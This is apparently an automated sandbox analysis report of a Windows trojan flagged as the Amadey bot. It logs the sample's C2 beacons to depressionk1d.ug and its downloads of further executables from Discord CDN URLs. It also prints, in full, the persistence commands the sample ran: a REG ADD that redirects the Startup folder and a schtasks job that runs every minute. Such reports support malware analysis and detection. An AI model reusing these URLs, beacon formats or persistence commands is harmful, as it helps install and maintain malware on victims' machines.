              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
              Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 12 Nov 2021 21:23:08 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 6ad2d1d6dd0a4a67-FRACache-Control: private, max-age=0Expires: Fri, 12 Nov 2021 21:23:08 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"X-GUploader-UploadID: ADPycduOQ2nv5Veqkgd42QiqIN1sIXdDYGJaK0wdLV8urQNgSpDr69pR3XIAio1f1sDT9Al4rmK8RALe4q8xWISXyFWgSRzLkgX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q%2FjU4Rea82v5xuYBKbz9MaCUJDcXw9Db8KegYBDPCbxZJb4DNC3pcuTEPmFF8DSyE4GjfahPmjnL5v9DsCEZQxtIP7%2BSQVzbWHaB%2B0QLIBIIuXnipLT8sfK8xIktf89J1y3hFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 12 Nov 2021 21:23:19 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 6ad2d21b2ab93140-FRACache-Control: private, max-age=0Expires: Fri, 12 Nov 2021 21:23:19 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"X-GUploader-UploadID: ADPycdvjQNyKaBXxiqCCobPtgG1KSRPDCVkVQPgNMJ5ySD5KjTZi-_A2_BiphWIxXC8S3a66EUhiAneSexuIfCuRJBIX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=keBV%2FCaatl1Isn0iloP08mxEsHAEsq6K0ajLic9XxHzBLDIBEDyhPhdOpctfhCe8O4VasRHLKe5D8QyIoiC61vEukE98minHtoN7xkp7Wt1eqnamo6RZxU7VpltHRKfEeLHxOQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
              Source: rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmp, rnyuf.exe, 00000003.00000002.946760130.00000000048E8000.00000004.00000001.sdmp, rnyuf.exe, 00000003.00000002.946810701.00000000048EB000.00000004.00000001.sdmp, rnyuf.exe, 00000003.00000003.882561138.000000000487F000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php
              Source: rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php33219
              Source: rnyuf.exe, 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php3321961m3
              Source: rnyuf.exe, 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1
              Source: rnyuf.exe, 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=122q2
              Source: rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1S0
              Source: rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1f0
              Source: rnyuf.exe, 00000003.00000003.756308778.000000000486C000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.phpMT
              Source: rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.phpncoded
              Source: rnyuf.exe, 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.phpoAnm
              Source: rnyuf.exe, 00000003.00000003.718145594.0000000000E9E000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
              Source: rnyuf.exe, 00000003.00000003.810127910.000000000488B000.00000004.00000001.sdmpString found in binary or memory: https://displaycatalogg/k8FppT/index.php
              Source: unknownHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: unknownDNS traffic detected: queries for: depressionk1d.ug
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810887417176084/vms.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810886561534042/slhost.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810887417176084/vms.exe HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810886561534042/slhost.exe HTTP/1.1Host: cdn.discordapp.com
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49785 version: TLS 1.2

              System Summary:

              barindex
              PE file contains section with special charsShow sources
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0127CD153_2_0127CD15
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0127CD4C3_2_0127CD4C
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0127CD503_2_0127CD50
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0127CDE83_2_0127CDE8
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012531C03_2_012531C0
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0127CDDC3_2_0127CDDC
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012748703_2_01274870
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01263B473_2_01263B47
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0127CE003_2_0127CE00
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe 735D3E2EB44123FE560CE027B907B3B1494B0F926ACEB641DCDF428A21B8AAC0
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: Section: ZLIB complexity 1.00041698052
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: Section: ZLIB complexity 1.00077810002
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: Section: ZLIB complexity 1.02178217822
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: Section: ZLIB complexity 1.04119850187
              Source: rnyuf.exe.0.drStatic PE information: Section: ZLIB complexity 1.00041698052
              Source: rnyuf.exe.0.drStatic PE information: Section: ZLIB complexity 1.00077810002
              Source: rnyuf.exe.0.drStatic PE information: Section: ZLIB complexity 1.02178217822
              Source: rnyuf.exe.0.drStatic PE information: Section: ZLIB complexity 1.04119850187
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeVirustotal: Detection: 70%
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /FJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vms[1].exeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeFile created: C:\Users\user\AppData\Local\Temp\15213853321935212556Jump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@13/6@2/2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_01
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic file information: File size 2588967 > 1048576
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x25ff27
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: rnyuf.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeCode function: 0_2_00D077B0 push ebp; mov dword ptr [esp], ebx0_2_00F673AB
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013A77B0 push ebp; mov dword ptr [esp], ebx3_2_016073AB
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01293D3B push ebp; mov dword ptr [esp], esi3_2_01614F32
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013E992D push ebx; mov dword ptr [esp], edx3_2_0163B348
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012D156A push ebx; mov dword ptr [esp], 25B522B7h3_2_016223E0
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012D156A push 1C8B7467h; mov dword ptr [esp], esi3_2_016223FA
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013B8161 push 6B345031h; mov dword ptr [esp], ebp3_2_016135C8
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012E85BC push ebx; mov dword ptr [esp], 23153BDCh3_2_0163606D
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013DE18E push edi; mov dword ptr [esp], edx3_2_0162E8C7
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012A35FF push esi; mov dword ptr [esp], ecx3_2_0161538A
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012E85C6 push 1F1EAADDh; mov dword ptr [esp], edx3_2_0162FC3C
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01437068 push 4F6CC8BDh; mov dword ptr [esp], ebx3_2_016232D7
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013D547B push 1DCAEB9Dh; mov dword ptr [esp], ebx3_2_015DE720
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0141943A push eax; mov dword ptr [esp], 00000004h3_2_0163718C
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01441CC5 push 2B78D724h; mov dword ptr [esp], ebx3_2_01636E19
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0137E8AA push ebp; mov dword ptr [esp], 5CAAF538h3_2_01625A6E
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01343891 push 2297A551h; mov dword ptr [esp], ebp3_2_01627940
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01343891 push esi; mov dword ptr [esp], 146945FFh3_2_0163E2B1
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012EDC86 push 58108F33h; mov dword ptr [esp], eax3_2_0163FAA3
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01415CF6 push 0478B9E6h; mov dword ptr [esp], ecx3_2_0162C530
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0128E0E2 push eax; mov dword ptr [esp], 4E7A663Ah3_2_0163F22F
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013DC0E8 push 6EAC7F55h; mov dword ptr [esp], ebx3_2_01617080
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013DC0E8 push 7B8D7A8Eh; mov dword ptr [esp], ebx3_2_01624F59
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013C38E9 push esi; mov dword ptr [esp], ebx3_2_0163F527
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01412741 push 525E09E5h; mov dword ptr [esp], edi3_2_0163871B
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012F4727 push ebp; mov dword ptr [esp], esi3_2_0162CB73
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013A7F36 push edx; mov dword ptr [esp], ebx3_2_01635D46
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013F970E push ecx; mov dword ptr [esp], esp3_2_0163C2B1
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_013ABB02 push edi; mov dword ptr [esp], ebp3_2_0163249D
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01297F14 push 6978E969h; mov dword ptr [esp], esi3_2_0163F7F7
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012F7FBD push 07D536E7h; mov dword ptr [esp], edi3_2_01628192
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name: .imports
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name: .themida
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: section name: .boot
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name:
              Source: rnyuf.exe.0.drStatic PE information: section name: .imports
              Source: rnyuf.exe.0.drStatic PE information: section name: .themida
              Source: rnyuf.exe.0.drStatic PE information: section name: .boot
              Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
              Source: initial sampleStatic PE information: section name: entropy: 7.97940314248
              Source: initial sampleStatic PE information: section name: entropy: 7.97940314248

              Persistence and Installation Behavior:

              barindex
              Yara detected Amadey botShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000002.946875767.00000000048F5000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.943681294.0000000000E23000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.943646127.0000000000DE9000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.882574918.00000000048C6000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.882522004.00000000048B3000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.810169410.0000000000E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.744803770.0000000000E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rnyuf.exe PID: 5824, type: MEMORYSTR
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeFile created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeJump to dropped file

              Boot Survival:

              barindex
              Creates an undocumented autostart registry key Show sources
              Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
